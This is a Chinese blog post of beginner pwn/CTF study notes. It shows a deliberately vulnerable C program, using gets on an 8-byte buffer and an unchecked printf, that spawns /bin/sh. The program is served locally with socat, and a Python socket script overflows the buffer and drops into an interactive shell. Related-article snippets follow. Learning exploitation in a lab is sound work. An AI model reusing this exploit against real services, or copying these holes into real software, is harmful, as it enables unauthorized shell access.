【pwn入门】使用python打二进制

原创 已于 2023-12-02 22:17:41 修改 · 601 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #服务器 #开发语言

于 2023-10-27 22:50:35 首次发布
本文介绍了在B站的学习笔记中,关于C语言编程中的安全漏洞,如如何通过`gets`函数实现远程代码执行,以及如何构造攻击脚本利用该漏洞创建shell。还涉及了程序的编译和通过TCP/IP网络进行交互的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

声明

本文是B站你想有多PWN学习的笔记,包含一些视频外的扩展知识。

有问题的源码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char sh[]="/bin/sh";
int init_func(){
    setvbuf(stdin,0,2,0);
    setvbuf(stdout,0,2,0);
    setvbuf(stderr,0,2,0);
    return 0;
}

int func(char *cmd){
    system(cmd);
    return 0;
}

int main(){
    char a[8] = {};
    char b[8] = {};
    puts("input:");
    gets(a);
    printf(a);
    if(b[0]==0x10){
       func(sh);
    }
    return 0;
}

使用以下命令进行编译:

gcc question_1.c -o question_1_plus_x64

程序网络交互初体验

将程序部署成可以远程访问的

socat tcp-l:8877,fork exec:./question_1_plus_x64,reuseaddr

在这里插入图片描述

通过网络访问程序

nc 127.0.0.1 8877

在这里插入图片描述

攻击脚本

import socket
import telnetlib


def pwn():
    # 创建一个TCP socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 连接服务器127.0.0.1的8877
    s.connect(("192.168.44.138", 8877))
    payload = 'A' * 0x8 + '\x10\n'  # 构造payload
    s.sendall(payload.encode(encoding='utf_8', errors='strict'))  # python3这里需要编码
    # 创建一个telnet来产生一个控制服务器的shell
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()


if __name__ == "__main__":
    # socat tcp-l:8888,fork exec:./question_1_plus_x64,reuseaddr
    pwn()

在这里插入图片描述

Jeff_Scott
关注
python安装pwn_Linux pwn入门教程(0)——环境配置
weixin_34413579的博客
02-10 956
作者:Tangerine@SAINTSEC0x00前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的pwn入门课程中的技...
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
热门推荐
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
python安装pwn_PWN入门入门——工具安装
weixin_39866874的博客
12-21 1273
安装pwntool:命令行运行:1 pip install pwntools1 python2 importpwn3 pwn.asm("xor eax,eax")出现'1\xc0'说明安装成功在pycharm中运行出错:_curses.error: must call (at least) setupterm() first解决方案:https://stackoverflow.com/quest...
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3749
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
攻防世界misc新手_攻防世界pwn新手练习(get_shell)
weixin_39630247的博客
11-25 303
pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头)IDA ProIDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。pwntoolspwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开发,并使利用编写尽可能简单。 实...
在Linux中编写python脚本的基本操作(pwn学习)
EpiphanyGod的博客
09-06 498
在学习pwn中,在Linux中编写python脚本是解决pwn问题的基础,也是入门,下面来介绍在pwn学习中编写python脚本的基础操作。1.用vim指令新建或者打开一个以.py为后缀的文件。vim exp.py2.基本模式普通模式:在vim指令进入一个编辑框后,默认模式就是普通模式,可以移动光标和执行命令。插入模式:按 i 进入插入模式,可以进行脚本的编辑。(编辑后按esc键可以转换到普通模式)。命令模式:按 : 进入命令模式,可以执行命令的操作。3.编辑脚本的保存与退出。
CTF比赛 二进制 PWN方向入门:基础知识点精讲
qq_62564422的博客
02-05 2294
称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态。这些参数仍会保存在调用函数(caller)的函数状态内,之后压入栈内的数据都会作为被调用函数(callee)的函数状态来保存。再将当前的ebp 寄存器的值(也就是调用函数的基地址)压入栈内,并将 ebp 寄存器的值更新为当前栈顶的地址。p2 1:59:00 开始。
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 2118
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
linux漏洞挖掘入门,Linux 二进制漏洞挖掘入门系列之(一)栈溢出
weixin_30277297的博客
05-13 653
欢迎访问系列文章Linux 二进制漏洞挖掘入门系列之(二)堆溢出:off-by-oneLinux 二进制漏洞挖掘入门系列之(三)整数溢出Linux 二进制漏洞挖掘入门系列之(四)格式化字符串漏洞Linux 二进制漏洞挖掘入门系列之(五)UAF 漏洞分析与利用0x10 环境gdb-peda 插件,用来调试程序时,高亮不同寄存器,堆栈的地址和数据Windows 环境下的 IDA Pro,强大的交互式反...
PWN入门学习
qq_20254219的博客
10-20 2912
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
python练习—pwn格式化字符串
v_3483608762的博客
07-25 680
[第五空间2019 决赛]PWN5 好长时间没有写博客了,记录一下。 1, printf(&buf)为明显的格式化字符串漏洞 格式化字符串漏洞 可以利用他覆盖掉un_804c044,从而可以执行后门程序。 2第一种方法 使用fmtster——payload函数,简单了当的覆盖掉目标地址。 详情 :fmtster函数 from pwn import * p=process('pwn') # p=remote('node4.buuoj.cn',29440) unk_char=0x0804C044 pa
基于pwntools编写pwn代码
Yale的博客
12-26 1630
0x01 Pwntools安装,一条命令就能搞定 pip install --upgrade pwntools 安装完毕后在python环境下只需使用 from pwn import * 即可导入 这会将大量的功能导入到全局命名空间,然后我们就可以直接使用单一的函数进行汇编、反汇编、pack,unpack等操作。 常用的模块有下面几个: asm : 汇编与反汇编,支持x86/x64/arm/mip...
pwn
weixin_42072280的博客
05-13 650
pwn 参考:百度百科 ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了。 pip安装时报错Cannot uninstall 'pyserial'. It is a distutils installed project and thus we...
pwn相关知识点
2301_79879963的博客
05-31 630
如图为puts函数汇编代码开头一部分,可以看到在执行strlen函数之前rdi寄存器是没有被改变的,一直是puts()函数接收的数据那么我们就可以利用修改strlen函数的got表,使之找到system,那么我们在使用puts函数的时候只需要把原始数据'/bin/sh'发送过去,就能够执行system /bin/sh获取权限。类型,该类型是标准C库中定义的,为unsigned int类型,即无符号整数类型,但在if判断时将其转为有符号整型,而read时又为无符号整型,那就存在无符号转有符号漏洞。
PWN入门
247533的博客
02-19 835
pwn exp
二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
leah126的博客
07-25 1万+
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
PWN的简单了解
cyy001128的博客
12-01 1292
Pwn 是一个骇客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:"You just got pwned!")。在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或个人电脑)、网站、闸道装置、或是应用程序,"pwn"在这一方面的意思是攻破("to compromise",危及、损害)或是控制("to control")。
[pwntools 及其他pwn工具使用使用教程(1)]
GUANGUANMAO1的博客
11-08 1352
pwntools是一个专为二进制漏洞利用开发设计的强大 Python 库。
PWN_新手学习内容
mi_qianfeng的博客
08-03 743
一,程序执行以及栈的调用 1,基本程序调用过程 取数 运算 条件 控制 2,函数调用过程 压参数栈 call目标函数:push %rip, jmp 保存状态 压栈局部变量 ret:pop %rsp,jmp 3,函数调用中的链接plt和got表 延迟链接:初次调用时会比较麻烦 jmp plt jmp got jmp plt push x jmp plt[0] call resolve push , jmp ..................
ctfshow pwn入门5打不开
最新发布
03-12
### CTFShow PWN入门5无法打开的原因分析 当遇到CTFShow PWN入门5无法正常启动的情况时,通常是因为环境配置不正确或者依赖项缺失所引起的。如果在尝试运行过程中提示`application`和`inputfile`为空,并且焦点停留在`parameter`上,则可能意味着程序未能成功加载所需的文件或参数[^1]。 为了排查此类问题,建议验证以下几个方面: - **确认输入路径**:确保提供给应用程序的文件路径是绝对路径而非相对路径,防止因工作目录不同而导致找不到指定文件。 - **检查权限设置**:对于涉及读取/写入操作的目标文件,需保证当前用户具有足够的访问权限;另外,在某些情况下还需要赋予可执行位以便顺利调用二进制文件。 - **核对版本兼容性**:不同的操作系统平台以及Python解释器版本可能会对接口行为造成影响,因此要留意官方文档中关于支持的操作系统列表及其对应的编程语言需求说明。 ```bash # 使用ls命令查看目标文件是否存在并获取其属性信息 ls -l /path/to/inputfile ``` ```python import os def check_file_access(file_path): """检测文件是否可以被访问""" if not os.path.exists(file_path): print(f"{file_path} does not exist.") return False try: with open(file_path, 'r') as f: pass print(f"Successfully accessed {file_path}.") return True except IOError as e: print(e) return False check_file_access('/path/to/application') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值